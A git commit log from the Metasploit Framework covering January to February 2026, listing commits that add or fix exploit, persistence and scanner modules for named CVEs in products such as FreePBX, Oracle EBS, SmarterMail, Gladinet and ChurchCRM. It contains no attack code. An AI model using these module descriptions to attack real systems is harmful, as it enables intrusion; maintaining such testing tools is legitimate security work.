- Fix regex in gladinet mixin to handle machineKey with decryption attribute
- Add Julien Voisin as reviewer in auxiliary modules

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2026-02-04 08:38:34 +01:00
Valentin Lobstein 6d25006e8d Update documentation/modules/auxiliary/gather/gladinet_storage_access_ticket_forge.md
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2026-02-04 08:38:33 +01:00
Valentin Lobstein 1c929ae5b6 Update lib/msf/core/auxiliary/gladinet.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2026-02-04 08:38:33 +01:00
Valentin Lobstein 6773459759 Update documentation/modules/auxiliary/gather/gladinet_storage_access_ticket_forge.md
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2026-02-04 08:38:33 +01:00
Valentin Lobstein 38efe8264d Improve Gladinet detection: check for y-glad cookies and branding in addition to ViewState 2026-02-04 08:38:32 +01:00
Valentin Lobstein 628c5ee7af Update Gladinet modules: fix AutoCheck in auxiliary modules and update documentation with real outputs 2026-02-04 08:38:32 +01:00
Valentin Lobstein 180527876b Fix Rubocop offenses in gladinet_storage_lfi_cve_2025_11371 2026-02-04 08:38:31 +01:00
Valentin Lobstein 478345506e Add Gladinet CentreStack/Triofox auxiliary modules and exploit 2026-02-04 08:38:31 +01:00
jenkins-metasploit 7f5d4545ab automatic module_metadata_base.json update 2026-02-04 07:18:40 +00:00
msutovsky-r7 9f90da27c8 Land #20834, fixes NoMethodError in teamviewer_password post module
Fix teamviewer_password module NoMethodError
2026-02-04 08:09:32 +01:00
Martin Sutovsky 0c125bfab8 Rubocopes 2026-02-04 07:53:05 +01:00
Martin Sutovsky dbe8b5574f Updates JWT 2026-02-04 07:52:21 +01:00
Rudraditya Thakur 366bc5335b updated: ldap_entry_cache var with max_size argument 2026-02-04 11:22:36 +05:30
Jack Heysel bd049dcba4 doc update 2026-02-03 18:41:51 -08:00
Jack Heysel a868bc95b2 GNU Inetutils Telnet Auth Bypass 2026-02-03 17:45:59 -08:00
adfoster-r7 ded7535c80 Merge pull request #20368 from isaac-app-dev/fix-issue-19384
Fixes MsfVenom not running outside framework dir
2026-02-04 00:22:52 +00:00
Spencer McIntyre c8c7705190 Add notes about the new option 2026-02-03 17:38:56 -05:00
Spencer McIntyre 5ae18d1307 Allow toggling the SACL in queries 2026-02-03 17:31:03 -05:00
Spencer McIntyre 5e43beca60 Merge pull request #20920 from rudraditya21/fix/cracker-auto-action
Handle ACTION=auto with CRACKER_PATH in password crackers
2026-02-03 17:23:49 -05:00
jenkins-metasploit 967b43ee2e automatic module_metadata_base.json update 2026-02-03 21:22:25 +00:00
Spencer McIntyre e55d22a7cd Merge pull request #20739 from cdelafuente-r7/add_mitre_tech_kerb_unconst_deleg
Add MITRE ATT&CK techniques to Kerberos and unconstrained delegation modules
2026-02-03 16:11:37 -05:00
adfoster-r7 36a240a07e Merge pull request #20926 from cgranleese-r7/renames-windows-file-system-methods
Renames Windows File System namespaces
2026-02-03 21:03:07 +00:00
Christophe De La Fuente 0c0e290cc2 Code review 2 2026-02-03 21:53:05 +01:00
sfewer-r7 5b2c0945db we can trigger on older versions like 12.7.11.1182 but several requests must be POST and not GET, however on newer versiosn 12.8.* they must be GET 2026-02-03 17:51:03 +00:00
sfewer-r7 65b0ef2480 detect wind/lin/mac platforms 2026-02-03 17:49:43 +00:00
dwelch-r7 71924e29ab Merge pull request #20928 from adfoster-r7/fix-label-check-bug
Fix label check bug
2026-02-03 16:26:39 +00:00
adfoster-r7 9fde4e0a3e Fix label check bug 2026-02-03 16:24:00 +00:00
adfoster-r7 b6e70417fe Merge pull request #20927 from adfoster-r7/add-notice-about-extended-test-suite
Add notice about extended test suite
2026-02-03 16:10:32 +00:00
adfoster-r7 4c498a74f1 Add notice about extended test suite 2026-02-03 15:39:31 +00:00
LucasCsmt 198926b761 Refactoring code disposition
The code have been refactored to be more organised.
2026-02-03 16:11:40 +01:00
LucasCsmt 808a514102 Better title for the module 2026-02-03 15:48:06 +01:00
LucasCsmt e27112275a Metasploit module for ChurchCRM's RCE
This commit add the module that exploit the ChurchCRM Unauth RCE.
2026-02-03 15:47:28 +01:00
cgranleese-r7 89ebdeacef Renames Windows file system namespaces 2026-02-03 11:23:04 +00:00
sfewer-r7 683c5c0ce8 stability is CRASH_SERVICE_RESTARTS as loading a native code extension can cause a timeout and the service will restart. The MSF session is not affected by this. And the target is re-exploitable after service restarts. 2026-02-03 10:57:40 +00:00
sfewer-r7 290fce8423 favor += so rubocop lets us keep the self. which is more explicit IMHO 2026-02-03 10:56:32 +00:00
sfewer-r7 2733269739 remove the unused option FILE_CONTENTS 2026-02-03 10:33:52 +00:00
sfewer-r7 d782c7bbd3 we no longer need Retry 2026-02-03 10:31:13 +00:00
sfewer-r7 8fbc577b73 fix typos 2026-02-03 10:30:52 +00:00
bwatters-r7 41defeea8d Add catch for invalid credentials to prevent stacktrace 2026-02-02 17:00:10 -06:00
Spencer McIntyre ef20db76b9 Merge pull request #20910 from jheysel-r7/docs/gsoc-2026-wiki-update
GSoC 2026 Wiki Updates
2026-02-02 14:44:00 -05:00
jheysel-r7 a65a013b2b Apply suggestions from code review 2026-02-02 11:39:34 -08:00
Jack Heysel a047ff9e79 Update docs 2026-02-02 08:25:25 -08:00
Martin Sutovsky 9a18fcf49b Fixes JWT payload and base64 encoding 2026-02-02 14:13:51 +01:00
Christophe De La Fuente b85b2d4528 Add comments and remove T1077_WINDOWS_ADMIN_SHARES (deprecated) 2026-02-02 12:03:17 +01:00
Martin Sutovsky a6e750518d Fixes basic JWT encoding, code refactors, add better failure codes and messages 2026-02-02 11:17:26 +01:00
Martin Sutovsky 32eaa4e80b Adds base for JWT signing 2026-02-02 08:05:32 +01:00
jenkins-metasploit f5829a7950 automatic module_metadata_base.json update 2026-02-01 20:25:20 +00:00
adfoster-r7 677fa6243e Merge pull request #20883 from jheysel-r7/fix/impersonate_config_check
Add validate_options check for IMPERSONATE and IMPERSONATE_TYPE in get_ticket
2026-02-01 20:16:18 +00:00
Rudraditya Thakur a3dd697f6e fixed: auto cracker selection with CRACKER_PATH 2026-02-01 21:59:31 +05:30
h00die 75ff7b6af1 emacs extension persistence 2026-01-31 22:54:18 -05:00
jenkins-metasploit 0b210b6f70 automatic module_metadata_base.json update 2026-02-01 00:00:09 +00:00
adfoster-r7 e2d4a5f5bd Merge pull request #20916 from Chepycou/master
fix : updated printing to prevent crash in auxiliary/scanner/sap/sap_soap_rfc_system_info or sap_icf_public_info.rb
2026-01-31 23:50:48 +00:00
kukly 14f10c73e4 rm unused element from TeamViewer registry keys array 2026-01-31 18:33:04 +01:00
bwatters-r7 79eaded0f3 Rebase and steal great ideas from karanabe in #20882 2026-01-30 17:07:32 -06:00
sfewer-r7 77b6aff818 add in initial web help desk exploit with a windows target 2026-01-30 22:05:08 +00:00
bwatters-r7 e7881465f6 Add kerberos check and documentation on relay 2026-01-30 16:05:08 -06:00
bwatters-r7 dca11f8711 update non-relay web enrollment docs 2026-01-30 16:05:08 -06:00
bwatters-r7 b19b578671 Library split, imports fixed, but HTTP auth for CSR broken? 2026-01-30 16:05:08 -06:00
bwatters-r7 16b5c01871 Split required methods from ms_icpr library 2026-01-30 16:05:08 -06:00
bwatters-r7 54e26f65f2 ESC2 on_behalf_of working 2026-01-30 16:05:08 -06:00
bwatters-r7 7cc0b98d08 With not-working on_behalf_of 2026-01-30 16:05:08 -06:00
bwatters-r7 372a22c8ab Add ALT_UPN and ALT_DNS, remove unneeded options
Still neet to add `on_behalf_of`
2026-01-30 16:05:08 -06:00
bwatters-r7 9b0f8ab510 Update default mode option, module name, and description 2026-01-30 16:05:08 -06:00
bwatters-r7 06633cf7f4 Fix domain query and comparisons, add check, validate, and match options for esc8 2026-01-30 16:05:08 -06:00
Brendan e7f8b07476 Merge pull request #20882 from karanabe/icpr_cert-rsa-keysize
Add RSAKeySize option to satisfy AD CS template minimums
2026-01-30 15:56:58 -06:00
Chepycou 343132b658 fix : Update sap_soap_rfc_system_info.rb result printing to fix crash 2026-01-30 18:44:02 +01:00
Chepycou 12a1467b7e fix: Updated sap_icf_public_info.rb result printing to prevent crash 2026-01-30 18:43:07 +01:00
Rudraditya Thakur 0dcebd7ef3 added: max_size as word argument 2026-01-30 21:29:30 +05:30
jenkins-metasploit 4674c86a65 automatic module_metadata_base.json update 2026-01-30 15:57:30 +00:00
jheysel-r7 adee4d223a Merge pull request #20894 from jameskim200/issue-20893-fix-typos-in-icmp_exfil
[ISSUE-20893] fix typos in the options descriptions of the `auxiliary/server/icmp_exfil` module
2026-01-30 07:46:54 -08:00
jenkins-metasploit bbc8f7d115 automatic module_metadata_base.json update 2026-01-30 14:56:39 +00:00
Martin Sutovsky 42d5d6a9f0 Adds checks for archiving and deleting workflow 2026-01-30 15:54:50 +01:00
jheysel-r7 c31a606cb4 Merge pull request #20898 from raboof/exploit-continuum-add-cve-reference
add CVE reference to Continuum exploit
2026-01-30 06:47:30 -08:00
Martin Sutovsky 1053ae5c85 Fixes default action, adds base for documentation 2026-01-30 15:39:31 +01:00
Jack Heysel 2a85783207 Update navigation.rb 2026-01-30 06:57:52 -07:00
Martin Sutovsky a8a741fdc8 Adds more actions, adds extraction of JWT parameters, code refactor and code fixes 2026-01-30 11:01:46 +01:00
Martin Sutovsky 22b63aab29 Adds actions for module, adds arbitrary file extraction 2026-01-29 17:26:58 +01:00
jenkins-metasploit 3e630ac7b9 Bump version of framework to 6.4.112 2026-01-29 15:50:00 +00:00
Jack Heysel b3d6bbe469 Updated the How to Apply to GSoC page 2026-01-29 08:39:58 -07:00
jenkins-metasploit 155439ab97 automatic module_metadata_base.json update 2026-01-29 15:38:16 +00:00
dwelch-r7 6fedaeefc6 Merge pull request #20909 from adfoster-r7/align-login-scanner-apis
Align login scanner APIs
2026-01-29 15:29:12 +00:00
Jack Heysel 68079b8cd6 GSoC 2026 Ideas Page 2026-01-29 08:17:30 -07:00
adfoster-r7 e70483b785 Rubocop 2026-01-29 14:13:18 +00:00
dledda-r7 7ea76977ae feat: allow function calls as class instance and singleton 2026-01-29 08:28:08 -05:00
dledda-r7 58fc79d4f5 feat: add support for setting encoder in active modules with payload validation 2026-01-29 07:53:20 -05:00
Diego Ledda 9459571bc2 Update modules/payloads/singles/cmd/unix/bind_netcat.rb
Co-authored-by: Simon Janusz <85949464+sjanusz-r7@users.noreply.github.com>
2026-01-29 13:22:54 +01:00
dledda-r7 4cc546d363 feat: add default encoder selection when module is used 2026-01-29 01:18:00 -05:00
dledda-r7 b2bb97828d feat: add choose_encoder method to select encoders for payloads 2026-01-29 01:17:49 -05:00
dledda-r7 6a3c899e62 feat: implement choose_encoder method to select compatible encoders for payloads 2026-01-29 01:17:32 -05:00
Jack Heysel f08474e328 Updatd 2026 ideas page 2026-01-28 21:54:03 -07:00
jenkins-metasploit 38b3dad608 automatic module_metadata_base.json update 2026-01-29 04:14:36 +00:00
jheysel-r7 641ab527aa Merge pull request #20857 from msutovsky-r7/exploit/freepbx/sql_to_rce_chain
Adds exploit module for FreePBX (CVE-2025-66039, CVE-2025-61675)
2026-01-28 20:03:17 -08:00
Jack Heysel 63a66ee162 Improved CVE version range info in description 2026-01-28 20:15:25 -07:00
adfoster-r7 7d81b1aecb Align login scanner APIs 2026-01-28 16:56:52 +00:00
jenkins-metasploit 724b2c08f0 automatic module_metadata_base.json update 2026-01-28 15:27:41 +00:00
Spencer McIntyre 751ceaaaf3 Merge pull request #20902 from rudraditya21/fix/ssh-login-no-shell-success
Handle SSH login success when shell creation fails
2026-01-28 10:18:39 -05:00
jenkins-metasploit 23f64201b2 automatic module_metadata_base.json update 2026-01-28 14:53:46 +00:00
jheysel-r7 be4a69ab1d Merge pull request #20846 from msutovsky-r7/exploit/freepbx/injections_rce
Adds auxiliary module for FreePBX (CVE-2025-66039, CVE-2025-61675)
2026-01-28 06:39:47 -08:00
Spencer McIntyre 518d1c8538 Merge pull request #20897 from h00die/fix_john_cracker
fix jtr cracking
2026-01-28 09:31:13 -05:00
jheysel-r7 7d931c960c Merge pull request #20858 from msutovsky-r7/exploit/freepbx/unrestricted_file_upload
Adds exploit module for FreePBX (CVE-2025-66039, CVE-2025-61678)
2026-01-28 06:23:43 -08:00
h00die f8c2c585fa make hash_crack_validator executable 2026-01-28 09:18:42 -05:00
jheysel-r7 147a94cee5 Update freepbx_firmware_file_upload print statement 2026-01-28 06:08:47 -08:00
Spencer McIntyre da7596b01b Merge pull request #20908 from adfoster-r7/update-license-year
Update license year
2026-01-28 08:50:04 -05:00
h00die 04be22dc1a john formatter review 2026-01-28 07:44:50 -05:00
Martin Sutovsky e6b97a79a4 Addresses comments 2026-01-28 11:33:54 +01:00
Martin Sutovsky 7e92ef4811 Addresses comments 2026-01-28 11:14:24 +01:00
cgranleese-r7 494adbc831 Merge pull request #20890 from adfoster-r7/mark-additional-flakey-socket-tests
Mark additional flakey socket tests
2026-01-28 09:43:42 +00:00
adfoster-r7 c32e18cdc3 Update license year 2026-01-27 23:06:49 +00:00
adfoster-r7 136a159f1c Merge pull request #20905 from rapid7/smcintyre-r7/feat/act/add-to-project
Add the action file to add the PRs to the project
2026-01-27 22:57:51 +00:00
Spencer McIntyre 5ac9c8a2be Switch to pull_request_target 2026-01-27 13:32:57 -05:00
h00die 6d53d73758 debugging 2026-01-27 10:01:37 -05:00
jenkins-metasploit 5d4aef621b automatic module_metadata_base.json update 2026-01-27 14:48:26 +00:00
jheysel-r7 f31776caf0 Merge pull request #20778 from h00die/ssh_keys
Update and combine ssh key persistence with mixin
2026-01-27 06:39:10 -08:00
Martin Sutovsky 1b5d698458 Move module to different auxiliary category 2026-01-27 10:05:06 +01:00
Rudraditya Thakur 5f0ada0c64 fixed: ssh cmd_exec newline handling in command shells 2026-01-27 09:43:55 +05:30
h00die 0b68476817 Update modules/exploits/multi/persistence/ssh_key.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-01-26 16:44:46 -05:00
Spencer McIntyre 6142e24891 Add the action file to add the PRs to the project 2026-01-26 16:19:44 -05:00
adfoster-r7 f4e67b6455 Mark additional flakey socket tests 2026-01-26 21:11:13 +00:00
Jack Heysel f4427a3c04 Fix enum_user_directories duplicate dirs 2026-01-26 12:16:44 -07:00
Christophe De La Fuente f6d0f4008a Land #20896, ensured: MsTdsLogin7 UTF-18 fields use RubySMB String16 2026-01-26 19:01:00 +01:00
Rudraditya Thakur 93b0c3004f removed: the mixin's String16 class to stop BinData registry collisions and reverted: MsTdsLogin7 to its original :string16 2026-01-26 23:00:52 +05:30
Rudraditya Thakur ea63e0df93 handles ssh login success when session creation fails 2026-01-26 22:06:55 +05:30
Martin Sutovsky a1e56a0d36 Adds check method, adds sql injection abstraction 2026-01-26 16:07:00 +01:00
Martin Sutovsky 4a24653812 Adds disclosure date 2026-01-26 15:58:08 +01:00
Martin Sutovsky c5ffa557a7 Adds UID in documentation 2026-01-26 13:44:09 +01:00
Martin Sutovsky b44e06f25f Code cleanup, adds more entropy to job name 2026-01-26 13:40:31 +01:00
Martin Sutovsky ce4e176798 Expands check method 2026-01-26 13:30:26 +01:00
Arnout Engelen 2f2fea7f6b add CVE reference to Continuum exploit 2026-01-26 12:36:12 +01:00
Martin Sutovsky b263530180 Increases entropy of payload filename 2026-01-26 11:32:33 +01:00
h00die 582d5ea230 fix jtr cracking 2026-01-25 11:16:32 -05:00
Rudraditya Thakur 82bae54abe ensured: MsTdsLogin7 UTF-18 fields use RubySMB String16 2026-01-25 10:59:02 +05:30
Rudraditya Thakur 7134f7ab06 added: negative caching for LDAP lookup misses 2026-01-25 10:13:32 +05:30
h00die 048163ea89 ssh_key persistence review 2026-01-24 16:36:54 -05:00
kukly 510ec9b57d Merge branch 'master' into teamviewer_syntax_fix 2026-01-24 19:25:30 +01:00
jameskim200 d5eb7ed233 fix typos for the options descriptions 2026-01-23 02:52:28 -05:00
karanabe 2e1d688659 Use OptEnum for RSA key size options 2026-01-23 16:22:13 +09:00
jenkins-metasploit 591b3ea398 automatic module_metadata_base.json update 2026-01-22 19:35:48 +00:00
Spencer McIntyre c0e9288ac5 Merge pull request #20799 from jheysel-r7/feat/cacti_graph_template_rce
Cacti Graph Template Authenticated RCE [CVE-2025-24367]
2026-01-22 14:26:38 -05:00
Spencer McIntyre 18a4cf8c00 Use the ssl setting for HttpServer#start_service 2026-01-22 13:49:28 -05:00
jenkins-metasploit d54e6b6847 automatic module_metadata_base.json update 2026-01-22 16:42:07 +00:00
msutovsky-r7 b1b4020ea7 Land #20866, adds module for unauthenticated file upload in SmarterTools SmarterMail (CVE-2025-52691)
SmarterTools SmarterMail Unauth File Upload RCE [CVE-2025-52691]
2026-01-22 17:33:06 +01:00
Jack Heysel 34cebd1453 Update CheckCode messaging 2026-01-22 15:03:32 +01:00
Jack Heysel e9a6a6fd45 Responded to comments 2026-01-22 15:03:32 +01:00
Jack Heysel 96b788e1e8 Increase length of cron job name 2026-01-22 15:03:32 +01:00
Jack Heysel 0e0a6cc9cd Removed duplicate platform 2026-01-22 15:03:31 +01:00
Jack Heysel 2e484d552e Finishing touches 2026-01-22 15:03:31 +01:00
Jack Heysel 99e032f4af SmarterTools SmarterMail Unauth File Upload RCE [CVE-2025-52691] 2026-01-22 15:03:30 +01:00
msutovsky-r7 537a1c5395 Land #19821, adds Burpsuite persistence module
Burp extension persistence
2026-01-22 11:03:08 +01:00
jenkins-metasploit fd79b33758 Bump version of framework to 6.4.111 2026-01-22 03:35:53 +00:00
jenkins-metasploit 7f598f66f5 automatic module_metadata_base.json update 2026-01-22 00:20:35 +00:00
jheysel-r7 719874a7f4 Merge pull request #20750 from MatDupas/add-exploit-oracle-ebs-cve-2025-61882-module
Add exploit oracle ebs CVE 2025 61882 module
2026-01-21 16:08:09 -08:00
Jack Heysel 927f5330f4 Rubocop fixes 2026-01-21 14:56:08 -08:00
Jack Heysel c45309e9ab Added payload length guards 2026-01-21 11:34:21 -08:00
jheysel-r7 b6da204725 Apply suggestions from code review
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-01-21 10:09:12 -08:00
adfoster-r7 5ba95b5def Merge pull request #20888 from jheysel-r7/fix/bad_successor_service_auth_fix_2
Fixes the base service authenticator for BadSuccessor
2026-01-21 11:37:28 +00:00
jenkins-metasploit 8de1b4f37a automatic module_metadata_base.json update 2026-01-21 10:52:14 +00:00
msutovsky-r7 e38c278d86 Land #20840, updates MongoBleed scanner module (CVE-2025-14847)
Updated MongoDB memory disclosure module (CVE-2025-14847)
2026-01-21 11:42:55 +01:00
Alex 9f626a0c39 Update cve_2025_14847_mongobleed.rb 2026-01-21 11:27:03 +01:00
Alex 464e15152a Update cve_2025_14847_mongobleed.rb 2026-01-21 11:27:03 +01:00
Alex 087ab70a8e Update cve_2025_14847_mongobleed.rb 2026-01-21 11:27:02 +01:00
Alex 99636be776 Updated mongobleed 2026-01-21 11:27:02 +01:00
MatDupas b46649769e Fix formatting issues in oracle_ebs exploit script 2026-01-21 09:00:52 +01:00
MatDupas a05863f6f6 Clean up comment in generate_xsl_payload method
Removed comment about generating XSLT payload.
2026-01-21 08:57:10 +01:00
MatDupas cb3df4b4de Refactor payload options in Oracle EBS exploit 2026-01-21 08:56:01 +01:00
MatDupas c5df078b41 Clarify payload option comment in exploit module
Updated the comment for the payload option to clarify usage.
2026-01-21 08:54:53 +01:00
Martin Sutovsky ffb725f4da Rubocopes 2026-01-21 08:16:39 +01:00
haicen 21162d7519 partially addresses PR review 2026-01-20 22:30:29 -05:00
haicen c3830f6987 adds documentation 2026-01-20 22:29:29 -05:00
h00die 0234dc7a26 Update modules/exploits/multi/persistence/burp_extension.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-01-20 19:28:18 -05:00
h00die ad343cb383 Update modules/exploits/multi/persistence/burp_extension.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-01-20 19:27:46 -05:00
h00die cf43e496b1 Update modules/exploits/multi/persistence/burp_extension.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-01-20 19:27:08 -05:00
jenkins-metasploit 4d593dc99b automatic module_metadata_base.json update 2026-01-20 20:45:59 +00:00
jheysel-r7 c47a74d0dd Merge pull request #20770 from vognik/Splunk_2022-43571_CVE-2024-36985
Add Splunk RCE Exploits (CVE-2022-43571 & CVE-2024-36985)
2026-01-20 12:36:51 -08:00
MatDupas c351514291 Refine description for Oracle EBS CVE-2025-61882 exploit
Updated the description of the Oracle E-Business Suite CVE-2025-61882 RCE exploit module to provide more detailed information about the exploit mechanism and affected versions.
2026-01-20 21:09:25 +01:00
MatDupas df3a560d0c Update oracle_ebs_cve_2025_61882_exploit_rce.rb 2026-01-20 21:07:25 +01:00
jheysel-r7 b2db80de18 Merge pull request #20887 from cdelafuente-r7/fix_specs
Fix specs issue due to a missing `KrbClockSkew` option
2026-01-20 10:44:46 -08:00
Jack Heysel e3e388d57d Fixes the base service authenticator for BadSuccessor 2026-01-20 09:24:36 -08:00
Christophe De La Fuente 81bc7640f0 Add missing option KrbClockSkew to specs 2026-01-20 18:16:19 +01:00
dledda-r7 3477ec7a9d feat: add support for short command execution in bind_netcat module 2026-01-20 04:48:49 -05:00
MatDupas 37c69a9bf1 Refactor Oracle EBS CVE-2025-61882 exploit module
Updated the Oracle E-Business Suite exploit module to fix rubocop linting errors
2026-01-20 09:12:05 +01:00
vognik 9e320dd168 add suggestions from @jheysel-r7 2026-01-19 18:45:01 -08:00
jenkins-metasploit 3d18f613ba Bump version of framework to 6.4.110 2026-01-19 23:24:55 +00:00
jenkins-metasploit 905eeb16a6 automatic module_metadata_base.json update 2026-01-19 18:10:09 +00:00
jheysel-r7 eb49dade6f Merge pull request #20755 from rudraditya21/feature/kerberos-clock-skew
Added: Option to adjust kerberos clock
2026-01-19 10:00:54 -08:00
MatDupas bff88db29b Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2026-01-19 15:07:45 +01:00
MatDupas 9377662118 Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2026-01-19 15:06:47 +01:00
MatDupas 68f7d42bb8 Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2026-01-19 15:04:59 +01:00
Martin Sutovsky d2af23a4a6 Adds additional installation step 2026-01-19 11:25:39 +01:00
Martin Sutovsky 4e36ff99ac Adds additional installation step 2026-01-19 11:24:45 +01:00
Martin Sutovsky 3672e2ba45 Adds additional installation step 2026-01-19 11:23:09 +01:00
MatDupas 47d0b1c208 Clarify default payload comment in exploit module
Updated the comment for the default payload option to clarify its usage.
2026-01-19 10:47:47 +01:00
MatDupas 141fa5a169 Refactor smuggling payload creation and session handling
Refactor HTTP request smuggling logic and error handling.
2026-01-19 10:41:23 +01:00
MatDupas daf0fc89fc Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-01-19 10:34:24 +01:00
Jack Heysel b187466bb0 Validates IMPERSONATE_TYPE is set when IMPERSONATE is present 2026-01-18 18:37:58 -08:00
karanabe 61c1b8280f Add configurable RSA key size for ICPR 2026-01-18 20:21:55 +09:00
jenkins-metasploit 73127bb898 automatic module_metadata_base.json update 2026-01-17 19:47:42 +00:00
adfoster-r7 bb07207b9b Merge pull request #20861 from bcoles/post-linux-system-get_hostname
Post::Linux::System.get_hostname: Use session sysinfo if available
2026-01-17 19:38:21 +00:00
MatDupas 21a1245a77 Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-01-17 16:13:55 +01:00
MatDupas ec31ff1351 Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-01-17 16:08:43 +01:00
MatDupas 607f4651a5 Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-01-17 12:26:52 +01:00
MatDupas 54c6e18505 Update documentation/modules/exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.md
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-01-17 12:26:18 +01:00
jenkins-metasploit a1eb2e224c Bump version of framework to 6.4.109 2026-01-16 23:18:09 +00:00
adfoster-r7 0c2e390bd7 Merge pull request #20878 from jheysel-r7/fix/bad_successor_broke_kerberos_auth
Fix Kerberos Base Service Authenticator
2026-01-16 22:44:19 +00:00
Jack Heysel 4b610957ce Fix Kerberos Base Service Authenticator 2026-01-16 12:31:34 -08:00
h00die 7ccf574e99 burp extension all working 2026-01-16 08:44:27 -05:00
adfoster-r7 350a39c274 Bump mettle 2026-01-16 13:04:57 +00:00
adfoster-r7 1d9a1022ba Merge pull request #20851 from bcoles/rex-arch
Bump rex-arch gem from 0.1.18 to 0.1.19
2026-01-16 10:43:23 +00:00
bcoles 858b25c063 Bump rex-arch gem from 0.1.18 to 0.1.19 2026-01-16 11:24:21 +11:00
adfoster-r7 666c7ce362 Merge pull request #20865 from rajyavardhan01/docs/dect-scanner-documentation
Add documentation for auxiliary/scanner/dect modules
2026-01-16 00:00:22 +00:00
jenkins-metasploit e0332096ed automatic module_metadata_base.json update 2026-01-15 23:54:26 +00:00
adfoster-r7 8a129bfc92 Merge pull request #20873 from zeroSteiner/fix/issue/socket-channels-udp-flakies
Add more specific error messages
2026-01-15 23:44:05 +00:00
Brendan ade984aead Merge pull request #20793 from Chocapikk/avideo-v2
Add AVideo notify.ffmpeg.json.php unauthenticated RCE exploit (CVE-2025-34433)
2026-01-15 17:36:07 -06:00
Spencer McIntyre 36827c486d Add more specific error messages 2026-01-15 18:20:36 -05:00
Raj Handa b466371b46 Update DECT reference link to archive.org (dedected.org is offline) 2026-01-15 14:13:00 -08:00
h00die fa83217a07 burp extension java target working 2026-01-15 16:15:48 -05:00
jenkins-metasploit d084fd0799 automatic module_metadata_base.json update 2026-01-15 20:19:04 +00:00
Spencer McIntyre 6ae361b103 Merge pull request #20868 from adfoster-r7/fix-udp-sockets-for-php-meterpreter
Fix UDP sockets for PHP meterpreter
2026-01-15 15:09:26 -05:00
Simon Janusz 867ad79b83 Merge pull request #20870 from adfoster-r7/resolve-method-undefined-issue
Resolve method undefined issue
2026-01-15 16:55:56 +00:00
adfoster-r7 7f90e1f6a0 Resove method undefined issue 2026-01-15 16:32:46 +00:00
adfoster-r7 67e279ef8c Fix UDP sockets for php meterpreter 2026-01-15 16:31:16 +00:00
dledda-r7 d6d21bf188 feat: broken-up utils/exe.rb 2026-01-15 11:15:00 -05:00
dledda-r7 64663afe9e feat: update to_executable for windows x86 and x64 2026-01-15 11:14:22 -05:00
dledda-r7 b729b8c91e feat: utils/exe/windows/common add common method for windows 2026-01-15 11:13:54 -05:00
dledda-r7 d9d882c637 feat: utils/exe/common.rb add common methods 2026-01-15 11:13:18 -05:00
Spencer McIntyre 3ecd8005e4 Merge pull request #20772 from rmtsixq/master
Fix undefined variable in Host.normalize_host causing session failures when DB is connected
2026-01-15 10:48:28 -05:00
Martin Sutovsky b01353cc07 Code cleanup, removes line from documentation 2026-01-15 15:26:30 +01:00
Martin Sutovsky 85221800a4 Removes line from documentation, code cleanup 2026-01-15 15:23:54 +01:00
Martin Sutovsky c56f9d2ee2 Removes line from documentation 2026-01-15 15:20:44 +01:00
Martin Sutovsky ba1ba6d9cf Fixes Referer header 2026-01-15 15:20:44 +01:00
Martin Sutovsky 97116e404f Fixes the default value 2026-01-15 15:20:43 +01:00
Martin Sutovsky e114ecdfd5 Splitting the modules into separate PRs 2026-01-15 15:20:43 +01:00
Martin Sutovsky 5ee1a15b7d Addressing comments 2026-01-15 15:20:43 +01:00
Martin Sutovsky b4f4078956 Updates documentation 2026-01-15 15:20:42 +01:00
Martin Sutovsky ff5ad78912 Add directory cleanup 2026-01-15 15:20:42 +01:00
Martin Sutovsky 744b366c58 Msftidy documentation 2026-01-15 15:20:41 +01:00
Martin Sutovsky 8e8c61b9c1 Fixes typo in documentation 2026-01-15 15:20:41 +01:00
Martin Sutovsky dd678861cc Fixes the auxiliary module notes 2026-01-15 15:20:41 +01:00
Martin Sutovsky 3801408e79 Removes non-ascii character from description 2026-01-15 15:20:40 +01:00
Martin Sutovsky 0720ed8d5c Updates descriptions 2026-01-15 15:20:40 +01:00
Martin Sutovsky 7bbf49112f Updates documentation 2026-01-15 15:20:39 +01:00
Martin Sutovsky 147fd901b0 Adds descriptions 2026-01-15 15:20:39 +01:00
Martin Sutovsky cd38ca5fa5 Adds Module Notes for firmware upload rce module 2026-01-15 15:20:39 +01:00
Martin Sutovsky de856db75a Adds check methods, docs init 2026-01-15 15:20:38 +01:00
Martin Sutovsky aaf1c83f68 Modules init 2026-01-15 15:20:38 +01:00
jenkins-metasploit 5058bcad18 automatic module_metadata_base.json update 2026-01-15 12:53:19 +00:00
dwelch-r7 5bfa0ff761 Merge pull request #20869 from adfoster-r7/update-bad-successor-description
Update bad successor description
2026-01-15 12:43:47 +00:00
adfoster-r7 d1daf758ea Update bad successor description 2026-01-15 12:26:12 +00:00
dledda-r7 affabf3c55 refactor: reorder parameters in to_executable methods for consistency 2026-01-15 04:35:38 -05:00
